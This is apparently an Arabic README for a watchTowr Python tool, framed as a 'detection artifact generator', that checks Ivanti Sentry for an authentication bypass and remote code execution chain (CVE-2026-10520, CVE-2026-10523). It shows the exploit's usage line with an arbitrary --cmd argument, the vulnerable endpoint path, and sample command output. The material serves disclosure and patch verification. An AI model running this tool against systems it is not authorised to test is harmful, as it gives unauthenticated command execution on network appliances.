
مولد قطع أثرية للكشف مبني على بايثون لثغرات تجاوز المصادقة وتنفيذ الأوامر عن بعد في Ivanti Sentry (CVE-2026-10520، CVE-2026-10523). يقوم بأتمتة فحوصات تنفيذ الأوامر ضد نقاط النهاية الضعيفة.
أداة لتوليد مؤشرات الكشف عن ثغرة تجاوز المصادقة وتنفيذ الأكواد عن بُعد في Ivanti Sentry.
راجع منشورنا على المدونة للاطلاع على التفاصيل التقنية.
$ python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py
(*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2026-10520, CVE-2026-10523]
============================================================
Target: https://127.0.0.1
Command: uname -a
[+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux
python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
يتحقق مولّد مؤشرات الكشف (Detection Artefact Generator) من watchTowr هذا من ثغرات Ivanti Sentry المتعلقة بتجاوز المصادقة وتنفيذ الأكواد عن بُعد، وهي CVE-2026-10520 و CVE-2026-10523.
تجدون تفاصيل المعالجة والمزيد من المعلومات في نشرة Ivanti الاستشارية: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523
لأحدث الأبحاث الأمنية، تابعوا فريق مختبرات watchTowr.